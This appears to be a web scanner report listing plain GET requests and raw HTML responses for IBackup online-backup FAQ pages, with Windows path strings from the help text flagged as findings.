cellpadding="0">               <tr>                 <td><h1>Frequently Asked Questions<a name="top" id="top"></a></h1></td>               </tr>             </table></td>         </tr>       </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr>   <td background="../images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="../images/obk_spacer.gif" width="2" height="45" /><br />     <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td valign="top" width="200"><div id="faq_list"> <span class="faq_head"><a href="index.html" class="faq_head">Online Backup</a></span>             <ul class="listbullet">               <li><a href="index.html" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="faqq_ibackup_mac.htm" class="rel_link">IBackup                  for Mac </a></li>               <li><a href="ibackup-for-iphone-faq.htm" class="rel_link">IBackup                  for iPhone </a></li>               <li><a href="faqq6n.htm" class="rel_link">Snapshots</a></li>               <li><a href="faqqsql.htm" class="rel_link">SQL      Server Backup</a></li>               <li><a href="faqq93a.htm" class="rel_link">Exchange                  Server Backup</a></li>               <li><a href="faq_oracle.htm" class="rel_link">Oracle                  Server Backup</a></li>               <li><a href="faqsharepoint.htm" class="rel_link">SharePoint Server Backup</a></li>               <li><a href="faqqssb.htm" class="rel_link">System                  State Backup</a></li>               <li><a href="faqqrsync.htm" class="rel_link">IBackup                  for Linux<br />                 (Command Line Interface)</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq2.htm" class="faq_head">Online Storage</a></span>             <ul class="listbullet">               <li><a href="faqq2.htm" class="rel_link">IBackup Drive</a></li>               <li><a href="faqq8n.htm" class="rel_link">IBackup Drive                  for Mac</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faq_webacc.htm" class="faq_head">Web Interface</a></span><b>(Web-Manager)</b>             <ul class="listbullet">               <li><a href="faq_webacc.htm" class="rel_link">File/Folder Management</a></li>               <li><a href="faq_webfold.htm" class="rel_link">WebFolders</a></li>               <li><a href="faq_share.htm" class="rel_link">Share</a></li>               <li><a href="faq_subac.htm" class="rel_link">Sub-Accounts</a></li>               <li><a href="faq_acct.htm" class="rel_link">Account Maintenance</a></li>               <li><a href="faq_report.htm" class="rel_link">Reports</a></li>               <li><a href="faq_managebkpset.htm" class="rel_link">Web Based Backup<br />                 Management</a></li>             </ul>             <br />             <a href="faqq_vista.htm" class="faq_head"><br />               Guideline FAQs</a>             <ul class="listbullet">               <li><a href="faqq_vista.htm" class="rel_link">Windows 7 and Vista</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="fwl_ibwin.htm" class="faq_head">Firewall Guidance</a></span>             <ul class="listbullet">               <li><a href="fwl_ibwin.htm" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="fwl_ibmac.htm" class="rel_link">IBackup                  for Mac</a></li>               <li><a href="fwl_ibdrive.htm" class="rel_link">IBackup Drive</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq94.htm" class="faq_head">Security</a></span>             <ul class="listbullet">               <li><a href="faqq94.htm" class="rel_link">Security                  and Encryption</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq96.htm" class="faq_head">Plans</a></span>             <ul class="listbullet">               <li><a href="faqq96.htm" class="rel_link">Subscription                  Plans</a></li>               <li><a href="faqq1.htm" class="rel_link">How                  do I decide which IBackup feature to use with my IBackup account?</a></li>               <li><a href="faqq92.htm" class="rel_link">Free                  Trial</a></li>               <li><a href="faqq97.htm" class="rel_link">Credit                  card Issues</a><br />                 <br />               </li>             </ul>             <span class="faq_head"><a href="faqq98.htm" class="faq_head">Miscellaneous</a></span><br />             <br />             <br />           </div></td>         <td width="25" class="faq_split"> </td>         <td width="680" valign="top" class="txtcontent"><TABLE WIDTH="100%" BORDER="0" CELLPADDING="0" CELLSPACING="0" class="txtcontent">             <TR>               <TD valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">                   <tr>                     <td width="5"> </td>                     <td class="linkbodygray"><span class="lnkmore">MS SharePoint Server - Granular backup / restore</span>                       <hr />                       <br />                       <table width="100%" border="0" cellspacing="2" cellpadding="4">                         <tr>                           <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                           <td><a href="#sp1" class="linkbodygray">Can I backup web-application, sites, sub-sites, list, and document libraries from my SharePoint Server?</a></td>                         </tr>                         <tr>                           <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                           <td><a href="#sp2" class="linkbodygray">Can I backup Web-application/sites from multiple web-front end?</a></td>                         </tr>                         <tr>                           <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                           <td><a href="#sp3" class="linkbodygray">Under what name and extension are the MS SharePoint server backup files stored on IBackup?</a></td>                         </tr>                         <tr>                           <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                           <td><a href="#sp4" class="linkbodygray">Can I restore my sites, sub-sites, list, and document library to different sites?</a></td>                         </tr>                         <tr>                           <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                           <td><a href="#sp5" class="linkbodygray">How to backup 12 hive folders or 14 hive folders of SharePoint Server?</a></td>                         </tr>                         <tr>                           <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                           <td><a href="#sp6" class="linkbodygray">Does IBackup for Windows SharePoint backup perform the backup of external dependencies like /_layouts/images/?</a></td>                         </tr>                         <tr>                           <td width="5"> </td>                           <td class="linkbodygray"><p><br>                               <br>                               <br>                               <br>                               <br>                               <br>                               <br>                               <br>                               <br>                               <br>                               <br>                               <br>                             </p>                             <p> </p>                             <p> </p>                             <p> </p>                             <p> </p>                             <p>  </p></td>                         </tr>                         <tr>                           <td> </td>                           <td background="../images/ibk_bg_ln.gif" class="txtcontent"> </td>                         </tr>                         <tr>                           <td width="5"> </td>                           <td class="txtcontent"><b><a name="sp1"></a><span class="txtstrong">Can I backup web-application, sites, sub-sites, list, and document libraries from my SharePoint Server?</span></b></td>                         </tr>                         <tr>                           <td width="5"> </td>                           <td class="txtcontent"><p align="justify"> Yes. IBackup for Windows SharePoint backup is a complete backup solution for your SharePoint server. It supports backup of web-application, sites, sub-sites, list, documents, and libraries from my SharePoint Server.</p></td>                         </tr>                         <tr>                           <td width="5">&am..
		 
		
		
		
			
				
					
						- /professional/online-backup-faq-ms-sqlserver.htm
						
					 
				 
			
			
			
			
			
			
				C:\Program Files\Microsoft SQL Server\80
			Request 
			GET /professional/online-backup-faq-ms-sqlserver.htm HTTP/1.1 Referer: http://www.ibackup.com/sitemap.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:54:17 GMT Server: Apache Last-Modified: Fri, 27 May 2011 11:03:43 GMT ETag: "304d7-99e4-4ddf850f" Accept-Ranges: bytes Content-Length: 39396 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Frequently asked questions on backup and restore of MS SQL server database</title> <link href="images/prof_style.css" rel="stylesheet" type="text/css" /> <script language="javascript" src="images/prof_swap.js"></script> <script language="JavaScript" src="images/prof_pmenu.js"></script> <script language="JavaScript" src="images/prof_mm_menu.js"></script> <style type="text/css"> <!-- .txtfooterbot {FONT: 11px Verdana, Arial, Helvetica, sans-serif; 	TEXT-TRANSFORM: none; 	COLOR: #fff; 	TEXT-DECORATION: none } --> </style> <link rel="icon" href="images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"  /> </head> <body onload="MM_preloadImages('images/prof_prd_ovr.jpg','images/ibp_features-ovr.jpg','images/ibp_dwnld-ovr.jpg','images/ibp_prdts-ovr.jpg','images/ibp_demo_ovr.jpg','images/ibp_security-ovr.jpg','images/ibp_partners-ovr.jpg','images/ibp_comp-ovr.jpg','images/ibp_supp-ovr.jpg','images/ibp_fqs-ovr.jpg')"> <script language="JavaScript1.2">mmLoadMenus();</script> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="images/prof_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">       <tr>         <td width="160"><a href="index.html"><img src="images/prof_logo.jpg" alt="IBackup Professional" width="160" height="115" border="0" /></a></td>         <td align="right"><table width="347" border="0" align="right" cellpadding="0" cellspacing="0">           <tr>             <td width="90" align="right"><a href="index.html"><img src="images/prof_homeicon_nw.jpg" alt="Home" width="90" height="115" border="0" /></a></td>                         <td width="140" align="right"><a href="online-backup-pricing.htm"><img src="images/prof_pricing_nw.jpg" alt="Pricing Plans" width="140" height="115" border="0" /></a></td>             <td width="117" align="right"><a href="online-backup-demo.htm"><img src="images/prof_demo.gif" alt="View Demo" width="117" height="115" border="0" /></a></td>           </tr>         </table></td>       </tr>     </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0" >   <tr>     <td><img src="images/prof_spacer.gif" width="10" height="6" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td width="106"><a href="https://www.ibackup.com/ibprof/jsp/ibpn_regterms.jsp" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image44','','images/ibp_signup-ovr.jpg',1)"><img src="images/ibp_signup.jpg" name="Image44" width="106" height="42" border="0" id="Image44" /></a></td>     <td width="106"><a href="online-backup-features.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image45','','images/ibp_features-ovr.jpg',1)"><img src="images/ibp_features.jpg" name="Image45" width="106" height="42" border="0" id="Image45" /></a></td>     <td width="106"><a href="online-backup-download.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image46','','images/ibp_dwnld-ovr.jpg',1)"><img src="images/ibp_dwnld.jpg" name="Image46" width="106" height="42" border="0" id="Image46" /></a></td>     <td width="106"><a href="#" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image47','','images/ibp_prdts-ovr.jpg',1)"><img src="images/ibp_prdts.jpg" name="Image47" width="106" height="42" border="0" id="Image47" onmouseover="MM_swapImage('Image47','','images/prof_prd_ovr.jpg',1);MM_showMenu(window.mm_menu_0215100459_0,0,42,null,'Image47')" onmouseout="MM_swapImgRestore();MM_startTimeout()" /></a></td>     <td width="106"><a href="online-backup-security.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image48','','images/ibp_security-ovr.jpg',1)"><img src="images/ibp_security.jpg" name="Image48" width="106" height="42" border="0" id="Image48" /></a></td>     <td width="106"><a href="partner/index.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image49','','images/ibp_partners-ovr.jpg',1)"><img src="images/ibp_partners.jpg" name="Image49" width="106" height="42" border="0" id="Image49" /></a></td>     <td width="112"><a href="online-backup-compliance.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image41','','images/ibp_comp-ovr.jpg',1)"><img src="images/ibp_comp.jpg" name="Image41" width="112" height="42" border="0" id="Image41" /></a></td>     <td width="106"><a href="online-backup-support.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image42','','images/ibp_supp-ovr.jpg',1)"><img src="images/ibp_supp.jpg" name="Image42" width="106" height="42" border="0" id="Image42" /></a></td>     <td width="106" align="left"><a href="online-backup-faq.htm" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image43','','images/ibp_fqs-ovr.jpg',1)"><img src="images/ibp_fqs.jpg" name="Image43" width="106" height="42" border="0" id="Image43" /></a></td>   </tr> </table>      <img src="images/prof_spacer.gif" width="10" height="8" /><br /> <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">   <tr>     <td width="750" valign="top" class="txt-content"><table width="100%" border="0" cellspacing="0" cellpadding="4">       <tr>         <td colspan="2"><span class="txt-orange"><a name="top" id="top"></a>Frequently Asked Questions for IBackup Professional</span><span class="txt-content">               <br />           If you have questions not covered along side,  email us at <a href="mailto:support@ibackup.com" class="lnk-body">support@ibackup.com</a>.<br />           <br />           <br />         </span></td>       </tr>       <tr>         <td colspan="2" class="txt-bold">MS SQL Server Backup  Related Questions</td>       </tr>       <tr>         <td width="12"><img src="images/prof_bullet.gif" width="7" height="8" align="absmiddle" /></td>         <td ><div align="justify"><a class="lnk-body"              href="#1">How do I             backup / restore the MS SQL Server database files?</a></div></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/prof_bullet.gif" width="7" height="8" vspace="5" /></td>         <td><div align="justify"><a class="lnk-body"              href="#2">Under            what extension are the MS SQL Server backup files stored in my online account?</a></div></td>       </tr>       <tr>         <td width="12"><img src="images/prof_bullet.gif" width="7" height="8" align="absmiddle" /></td>         <td><div align="justify"><a class="lnk-body"              href="#3">Can            I backup databases from multiple instances of the MS SQL            Server?</a></div></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/prof_bullet.gif" width="7" height="8" vspace="5" /></td>         <td><div align="justify"><a class="lnk-body"              href="#4">I am            unable to view the databases in  instance of the MS SQL Server that I            have logged into. Why?</a></div></td>       </tr>       <tr>         <td width="12"><img src="images/prof_bullet.gif" width="7" height="8" align="absmiddle" /></td>         <td><div align="justify"><a class="lnk-body"              href="#5">Can I            backup the MS SQL Server 'tempdb' database? </a></div></td>       </tr>       <tr>         <td width="12"><img src="images/prof_bullet.gif" width="7" height="8" align="absmiddle" /></td>         <td><div align="justify"><a class="lnk-body"              href="#6">Can            I  backup the entire SQL Server database? </a></div></td>       </tr>       <tr>         <td width="12"><img src="images/prof_bullet.gif" width="7" height="8" align="absmiddle" /></td>         <td><div align="justify"><a class="lnk-body"              href="#7">Under what circumstances should I restore the MS SQL Server 'master'            database?</a></div></td>       </tr>       <tr>         <td width="12"><img src="images/prof_bullet.gif" width="7" height="8" align="absmiddle" /></td>         <td><div align="justify"><a class="lnk-body"              href="#8">How do            I restore the MS SQL Server 'master' database?</a></div></td>       </tr>       <tr>         <td width="12"><img src="images/prof_bullet.gif" width="7" height="8" align="absmiddle" /></td>         <td><div align="justify"><a              class="lnk-body"              href="#9">When            should I restore the 'model,' 'msdb' and 'distribution'            databases?</a></div></td>       </tr>       <tr>         <td width="12" valign="top"><img src="images/prof_bullet.gif" width="7" height="8" vspace="5" align="absmiddle" /></td>         <td><div align="justify"><a class="lnk-body"              href="#10">Can I            backup the MS SQL Server related files using the Open file            backup feature?</a></div></td>       </tr>       <tr>         <td valign="top"><img src="images/prof_bullet.gif" width="7" height="8" vspace="5" /></td>         <td><div align="justify"><a class="lnk-body"              href="#11">I am getting an error message that reads 'Check registration of SQLVDI.DLL and value of IID' during SQL Server backup. Why?</a></div></td>       </tr>       <tr>         <td valign="top"><img src="images/prof_bullet.gif" width="7" height="8" vspace="5" /></td>         <td><div align="justify"><a class="lnk-body"              href="#diffsql">Can I restore my database file to a different MS SQL Server database?</a></div></td>       </tr>       <tr>         <td valign="top"><img src="images/prof_bullet.gif" width="7" height="8" vspace="5" /></td>         <td><div align="justify"><a class="lnk-body"              href="#mulrest">Can I restore database files to multiple SQL Server instances?</a></div></td>       </tr>     </table>       <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br />         <br /></td>     <td width="10" valign="top"> </td>     <td width="200" valign="top"><table width="200" border="0" align="center" cellpadding="0" cellspacing="0" class="txt-content">         <tr>           <td background="images/prof_boxtopbg.gif"><table width="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td width="4%"><img src="images/prof_spacer.gif" width="10" height="32" /></td>                 <td width="96%" align="left"><span class="txt-White">Resources</span></td>               </tr>           </table></td>         </tr>         <tr>           <td valign="top" background="images/prof_boxmidbg.gif"><table width="99%" border="0" align="center" cellpadding="0" cellspacing="0">               <tr>                 <td align="left" bgcolor="#F5F5F5"><table width="100%" border="0" cellspacing="0" cellpadding="0">                     <tr>                       <td width="4%"><img src="images/prof_spacer.gif" width="10" height="25" /></td>                       <td width="96%" align="left" class="txt-bold">Related FAQs </td>                     </tr>                 </table></td>               </tr>               <tr>                 <td align="left"><br />                  <table width="90%" border="0" align="center" cellpadding="3" cellspacing="0">                   <tr>                    <td align="left" class="txt-content"><img src="images/prof_bullet_rl.gif" width="14" height="14" align="absmiddle" /> <a href="online-backup-faq.htm" class="lnk-body-rl">FAQ                      Main Page</a></td>                   </tr>                   <tr>                    <td align="left" class="txt-content"><img src="images/prof_bullet_rl.gif" width="14" height="14" align="absmiddle" /> <a href="online-backup-faq-backup.htm" class="lnk-body-rl">Backup</a></td>                   </tr>                   <tr>                    <td align="left" class="txt-content"><img src="images/prof_bullet_rl.gif" width="14" height="14" align="absmiddle" /> <a href="online-backup-faq-cdp.htm" class="lnk-body-rl">Continuous                      data backup</a></td>                   </tr>                   <tr>                    <td align="left" class="txt-content"><img src="images/prof_bullet_rl.gif" width="14" height="14" align="absmiddle" /> <a href="online-backup-faq-restore.htm" class="lnk-body-rl">Restore</a></td>    ..
		 
		
		
		
			
				
					
						- /online-backup-faq/faqq4.htm
						
					 
				 
			
			
			
			
			
			
				
C:\Users\Music with mirroring option C:\My Documents\mydata on your IBackup side  
 
			Request 
			GET /online-backup-faq/faqq4.htm HTTP/1.1 Referer: http://www.ibackup.com/online-backup-web-manager/central-backup-status.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 02:01:27 GMT Server: Apache Last-Modified: Thu, 26 May 2011 05:33:32 GMT ETag: "350292-26162-4ddde62c" Accept-Ranges: bytes Content-Length: 156002 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>FAQ - IBackup For Windows</title> <link rel="stylesheet"  href="../includes/obk_style.css" type="text/css"> <script language="JavaScript" src="../includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="../includes/obk_mm_menu.js"></script> <script language="JavaScript" src="../includes/obk_pmenu.js"></script> <script language="JavaScript" src="../includes/obk_dropDown.js"></script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">   <tr>     <td background="../images/obk_topbg.jpg"><table width="960"  border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td width="160"><a href="../index.html"><img src="../images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a></td>           <td align="right" valign="top"><a  href="../feedback_new.htm"><img src="../images/obk_hd_support.jpg"  alt="Support" width="161" height="50" border="0" /></a></td>         </tr>       </table></td>   </tr> </table> <table width="100%" background="../images/obk_bacwin_bg.jpg" border="0" cellpadding="0" cellspacing="0">   <tr>     <td><img src="../images/obk_spacer.gif" width="2" height="9" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">         <tr>           <td id="mn_home"><a href="/index.html"><img src="../images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>           <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp"><img src="../images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a></td>           <td id="mn_price"><a href="/charginghelp_new.htm"><img src="../images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>           <td id="mn_prod"><a href="#"><img src="../images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>           <td id="mn_down"><a href="/online-backup-downloads"><img src="../images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>           <td id="mn_secur"><a href="/online-backup-security"><img src="../images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>           <td id="mn_supp"><a href="/feedback_new.htm"><img src="../images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>           <td id="mn_part"><a href="/online-backup-partners"><img src="../images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>           <td id="mn_faq"><a href="/online-backup-faq"><img src="../images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>         </tr>       </table>       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td background="../images/obk_banr_confirm.jpg" valign="top" class="backwin_confirm_banner"><table width="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td><h1>Frequently Asked Questions<a name="top" id="top"></a></h1></td>               </tr>             </table></td>         </tr>       </table></td>   </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">   <tr>     <td background="../images/obk_subpag_bg.jpg" style="background-repeat:repeat-x;"><img src="../images/obk_spacer.gif" width="2" height="45" /><br />       <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">         <tr>           <td valign="top" width="220"><div id="faq_list"> <span class="faq_head"><a href="index.html" class="faq_head">Online Backup</a></span>             <ul class="listbullet">               <li><a href="index.html" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="faqq_ibackup_mac.htm" class="rel_link">IBackup                  for Mac </a></li>               <li><a href="ibackup-for-iphone-faq.htm" class="rel_link">IBackup                  for iPhone </a></li>               <li><a href="faqq6n.htm" class="rel_link">Snapshots</a></li>               <li><a href="faqqsql.htm" class="rel_link">SQL      Server Backup</a></li>               <li><a href="faqq93a.htm" class="rel_link">Exchange                  Server Backup</a></li>               <li><a href="faq_oracle.htm" class="rel_link">Oracle                  Server Backup</a></li>               <li><a href="faqsharepoint.htm" class="rel_link">SharePoint Server Backup</a></li>               <li><a href="faqqssb.htm" class="rel_link">System                  State Backup</a></li>               <li><a href="faqqrsync.htm" class="rel_link">IBackup                  for Linux<br />                 (Command Line Interface)</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq2.htm" class="faq_head">Online Storage</a></span>             <ul class="listbullet">               <li><a href="faqq2.htm" class="rel_link">IBackup Drive</a></li>               <li><a href="faqq8n.htm" class="rel_link">IBackup Drive                  for Mac</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faq_webacc.htm" class="faq_head">Web Interface</a></span><b>(Web-Manager)</b>             <ul class="listbullet">               <li><a href="faq_webacc.htm" class="rel_link">File/Folder Management</a></li>               <li><a href="faq_webfold.htm" class="rel_link">WebFolders</a></li>               <li><a href="faq_share.htm" class="rel_link">Share</a></li>               <li><a href="faq_subac.htm" class="rel_link">Sub-Accounts</a></li>               <li><a href="faq_acct.htm" class="rel_link">Account Maintenance</a></li>               <li><a href="faq_report.htm" class="rel_link">Reports</a></li>               <li><a href="faq_managebkpset.htm" class="rel_link">Web Based Backup<br />                 Management</a></li>             </ul>             <br />             <a href="faqq_vista.htm" class="faq_head"><br />               Guideline FAQs</a>             <ul class="listbullet">               <li><a href="faqq_vista.htm" class="rel_link">Windows 7 and Vista</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="fwl_ibwin.htm" class="faq_head">Firewall Guidance</a></span>             <ul class="listbullet">               <li><a href="fwl_ibwin.htm" class="rel_link">IBackup                  for Windows</a></li>               <li><a href="fwl_ibmac.htm" class="rel_link">IBackup                  for Mac</a></li>               <li><a href="fwl_ibdrive.htm" class="rel_link">IBackup Drive</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq94.htm" class="faq_head">Security</a></span>             <ul class="listbullet">               <li><a href="faqq94.htm" class="rel_link">Security                  and Encryption</a></li>             </ul>             <br />             <br />             <span class="faq_head"><a href="faqq96.htm" class="faq_head">Plans</a></span>             <ul class="listbullet">               <li><a href="faqq96.htm" class="rel_link">Subscription                  Plans</a></li>               <li><a href="faqq1.htm" class="rel_link">How                  do I decide which IBackup feature to use with my IBackup account?</a></li>               <li><a href="faqq92.htm" class="rel_link">Free                  Trial</a></li>               <li><a href="faqq97.htm" class="rel_link">Credit                  card Issues</a><br />                 <br />               </li>             </ul>             <span class="faq_head"><a href="faqq98.htm" class="faq_head">Miscellaneous</a></span><br />             <br />             <br />           </div></td>           <td width="25" class="faq_split"> </td>           <td width="660" valign="top" class="txtcontent"><table WIDTH="100%" border="0" cellspacing="0" cellpadding="0">               <tr>                 <td width="5"> </td>                 <td><span class="lnkmore">IBackup For Windows</span>                   <hr />                   <br />                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>                       <td colspan="2"><span class="lnktxt">General</span><a name="gen"></a></td>                     </tr>                     <tr>                       <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td width="530"><a href="#1" class="linkbodygray">What is IBackup for Windows?</a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#2" class="linkbodygray">Does IBackup for Windows use Delta Blocking technology?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#3" class="linkbodygray">Does IBackup for Windows support my native character set?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#7" class="linkbodygray">What is the ideal solution for online backup of several hundred gigabytes of data?</a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                       <td><div align="justify"><a href="#8" class="linkbodygray">My initial backup was done via a shipped hard disk. But when I backup my data using the application, it seems to be backing up my files and folders all over again. Why?</a></div></td>                     </tr>                     <tr>                       <td> </td>                       <td> </td>                     </tr>                   </table>                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>                       <td colspan="2"><span class="lnktxt">Quota</span><a name="quo"></a></td>                     </tr>                     <tr>                       <td width="12"><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#4" class="linkbodygray">If I keep on performing backups, will I use up my quota quickly? </a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#5" class="linkbodygray">I received a quota overuse email. What should I do? </a></td>                     </tr>                     <tr>                       <td valign="top"><img src="../images/obk_bullet1.gif" width="13" height="12" vspace="3" /></td>                       <td><div align="justify"><a href="#6" class="linkbodygray">I have deleted some unwanted files/folders from my IBackup account. However, the 'Quota used' does not change. How do I know the exact quota used?</a></div></td>                     </tr>                   </table>                   <table width="100%" border="0" cellspacing="2" cellpadding="4">                     <tr>                       <td width="12"> </td>                       <td> </td>                     </tr>                     <tr>                       <td colspan="2" class="lnktxt">Backup<a name="bac" id="bac"></a></td>                     </tr>                     <tr>                       <td><img src="../images/obk_bullet1.gif" width="13" height="12" /></td>                       <td><a href="#9" class="linkbodygray">Suggestions for backing up C Drive</a></td>                     </tr>                     <tr>       ..
		 
		
		
		
			
			
			
			
			
			
				
c:\My Documents\docs\example.doc with mirroring option c:\My  
 
			Request 
			GET /faq_ibw6.htm HTTP/1.1 Referer: http://www.ibackup.com/information_bank_6.htm User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 02:24:08 GMT Server: Apache Last-Modified: Tue, 11 Jul 2006 12:18:26 GMT ETag: "10c422-2181b-44b39712" Accept-Ranges: bytes Content-Length: 137243 Content-Type: text/html <HTML> <HEAD> <title>Schedule backups using IBackup for windows - FAQ</TITLE> <META NAME="KEYWORDS" CONTENT="online backup data,online data backup,online server backup,online backup service,online server backups,online data backups,remote access, backup service,online file backups,online backups,remote data backups,online backup,online file backup,online backup services"> <META NAME="DESCRIPTION" CONTENT="Online Backup: Specializing in online backup services and online storage services"> <META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <script language="JavaScript"> <!-- function MM_reloadPage(init) {  //reloads the window if Nav4 resized   if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {     document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}   else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); // --> </script> <link href="images/style06.css" rel="stylesheet" type="text/css"> <script src="images/AC_RunActiveContent.js" type="text/javascript"></script> <style type="text/css"> <!-- .style1 {color: #CC0000} --> </style> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0"> <table width="570" border="0" cellspacing="0" cellpadding="0">      <tr>     <td width="5"> </td>     <td> </td>   </tr>   <tr>     <td width="5"> </td>     <td width="285"><span class="txtcontent"><img src="images/ib_ftib_06.gif" width="178" height="26"><a name="top"></a></span></td>   </tr>   <tr>     <td colspan="2" background="images/ib_06_bg_ln.gif" class="txtcontent"> </td>   </tr> </table> <table width="570" border="0" cellspacing="0" cellpadding="0">   <tr>     <td width="5"> </td>     <td><table width="100%" border="0" cellspacing="2" cellpadding="2">       <tr>         <td colspan="2"> </td>       </tr>       <tr>         <td colspan="2"><img src="images/txtibw_general.gif" width="196" height="27" 